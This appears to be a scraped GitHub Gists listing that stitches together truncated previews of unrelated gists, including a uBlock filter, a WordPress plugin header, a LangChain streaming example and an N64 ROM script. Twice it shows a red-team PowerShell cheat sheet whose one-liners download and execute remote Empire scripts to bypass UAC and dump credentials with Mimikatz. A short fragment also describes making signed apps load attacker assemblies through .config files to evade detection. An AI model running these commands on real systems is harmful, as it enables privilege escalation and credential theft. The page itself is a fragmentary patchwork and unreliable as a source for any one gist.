Simple overview of use/purpose.
An in-depth paragraph about your project and overview of use.
Discover gists
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| #Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| #Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| #Import Mimikatz Module to run further commands | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" |
aziraphale
/ ublock-origin-filter.txt
Created
February 1, 2020 01:50
uBlock Origin: Hide YouTube's "Breaking news" section
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ! [Add this to the "My filters" section of uBlock Origin's settings] | |
| ! ### Remove YouTube's gorram "Breaking news" section ### | |
| ! ### I go to YouTube to AVOID daily bullshit, not to have it shoved in my face!! ### | |
| ! This removes page-width blocks - `<ytd-rich-section-renderer>` tags - which have a descendent somewhere with ID "title" and the text "Breaking news". | |
| ! The match on "Breaking news" uses a regular expression primarily so that it can be made case-insensitive. | |
| ! The `#title` tag we're matching looked like this, at least for me on 2020-02-01: | |
| ! <span id="title" class="style-scope ytd-rich-shelf-renderer">Breaking news</span> | |
| ! The other two `:has()` rules are just a bit of extra filtering that I hope might improve performance and/or reduce the chance of this rule matching where it's not wanted. | |
| ! YouTube is likely to change things and break this rule before too long, in which case removing `:has(:scope #dismissable)` and `:has(:scope #featured-badge)` may help. | |
| ! Note that `:scope` limits matches to |
jivoi
/ RedTeam_CheatSheet.ps1
Created
July 14, 2018 14:52
— forked from m8sec/RedTeam_CheatSheet.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
glueckpress
/ wp-rocket-disable-preload.php
Last active
May 13, 2024 19:03
[WordPress][WP Rocket] Prevents WP Rocket’s preload bot from visiting your site.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Plugin Name: WP Rocket | Disable Cache Preloading | |
| * Description: Prevents WP Rocket’s preload bot from visiting your site. | |
| * Author: WP Rocket Support Team | |
| * Author URI: http://wp-rocket.me/ | |
| * Plugin URI: https://gist.github.com/glueckpress/a6c1f7a22a92e8e8bb10 | |
| * License: GNU General Public License v3 or later | |
| * License URI: http://www.gnu.org/licenses/gpl-3.0.html | |
| */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """This is an example of how to use async langchain with fastapi and return a streaming response. | |
| The latest version of Langchain has improved its compatibility with asynchronous FastAPI, | |
| making it easier to implement streaming functionality in your applications. | |
| """ | |
| import asyncio | |
| import os | |
| from typing import AsyncIterable, Awaitable | |
| import uvicorn | |
| from dotenv import load_dotenv |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/bash | |
| # Get entry point from N64 ROM | |
| dd if=test.z64 bs=1 skip=8 count=4 of=entrypoint >& /dev/null | |
| # Convert entrypoint to little endian | |
| #mips-elf-objcopy -I binary -O binary --reverse-bytes=4 entrypoint entrypoint | |
| # Construct an ELF | |
| mips-elf-objcopy -I binary test.z64 -O elf32-bigmips -B mips --adjust-section-vma .data+0x80000000 foo.elf | |
| # Patch to MIPS III | |
| printf '\x20\x00\x00\x00' | dd bs=1 seek=36 count=4 conv=notrunc of=foo.elf >& /dev/null |
JoshuaPurtell
/ gist:c1182551fa609736d47df4af82f7c5ab
Created
March 7, 2024 23:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import asyncio | |
| import copy | |
| import hashlib | |
| import json | |
| import os | |
| import random | |
| from dataclasses import dataclass | |
| from typing import Any, Dict, List, Optional | |
| import numpy as np |
jwhulette
/ awslogs-agent-setup.py
Last active
May 13, 2024 18:59
[FreeBSD AWS CloudWatch Logs installer] #python #aws
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved. | |
| # | |
| # Licensed under the Amazon Software License (the "License"). You may not use | |
| # this file except in compliance with the License. A copy of the License is | |
| # located at http://aws.amazon.com/asl/ or in the "license" file accompanying | |
| # this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR | |
| # CONDITIONS OF ANY KIND, either express or implied. See the License for the specific | |
| # language governing permissions and limitations under the License. |
NewerOlder